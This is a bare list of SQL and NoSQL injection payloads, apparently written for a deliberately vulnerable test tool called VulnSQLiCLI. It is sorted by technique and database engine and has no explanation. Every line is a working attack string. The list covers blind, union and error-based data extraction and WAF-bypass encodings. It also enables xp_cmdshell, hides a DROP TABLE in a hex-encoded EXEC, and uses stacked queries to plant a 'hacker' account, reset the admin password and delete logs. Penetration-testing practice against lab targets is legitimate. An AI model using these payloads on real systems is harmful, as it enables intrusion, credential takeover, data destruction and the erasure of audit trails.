# Advanced SQL Injection Payloads for VulnSQLiCLI
# Time-based payloads
'; WAITFOR DELAY '0:0:10'--
'; SELECT pg_sleep(10)--
'; SELECT SLEEP(10)--

# Union-based advanced payloads
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
' UNION SELECT NULL,NULL,NULL,version()--
' UNION SELECT NULL,user(),database()--
' UNION SELECT NULL,@@version,@@datadir--

# Error-based payloads
' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))--
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
' AND ROW(1,1) > (SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(95),FLOOR(RAND(0)*2))x FROM (SELECT 1 UNION SELECT 2)a GROUP BY x LIMIT 1)--

# Boolean-based blind payloads
' AND (SELECT SUBSTRING(@@version,1,1))='5'--
' AND (SELECT SUBSTRING(user(),1,1))='r'--
' AND (SELECT LENGTH(database()))>5--

# NoSQL injection payloads
';db.users.find();var a='
';return this.a==this.b||''=='
admin'||'1'=='1

# MSSQL specific payloads
'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--
'; DECLARE @S VARCHAR(4000);SET @S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000));EXEC(@S);--

# Oracle specific payloads
' UNION SELECT NULL,NULL,banner FROM v$version--
' UNION SELECT NULL,NULL,user FROM dual--

# PostgreSQL specific payloads
'; DROP TABLE IF EXISTS temp_table; CREATE TABLE temp_table AS SELECT version();--
' UNION SELECT NULL,NULL,version()--

# MySQL specific payloads
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
'; SET @sql = CONCAT('SELECT ', version()); PREPARE stmt1 FROM @sql; EXECUTE stmt1;--

# WAF bypass payloads
'/**/UNION/**/SELECT/**/1,2,3--
'+UNION+SELECT+1,2,3--
'%20UNION%20SELECT%201,2,3--
'/*comment*/UNION/*comment*/SELECT/*comment*/1,2,3--
'UNI/**/ON SE/**/LECT 1,2,3--

# Advanced time-based with calculations
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database() AND SLEEP(5))--
' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())>10,SLEEP(5),0)--

# Stacked queries
'; INSERT INTO users (username,password) VALUES ('hacker','password');--
'; UPDATE users SET password='hacked' WHERE username='admin';--
'; DELETE FROM logs WHERE id > 0;--
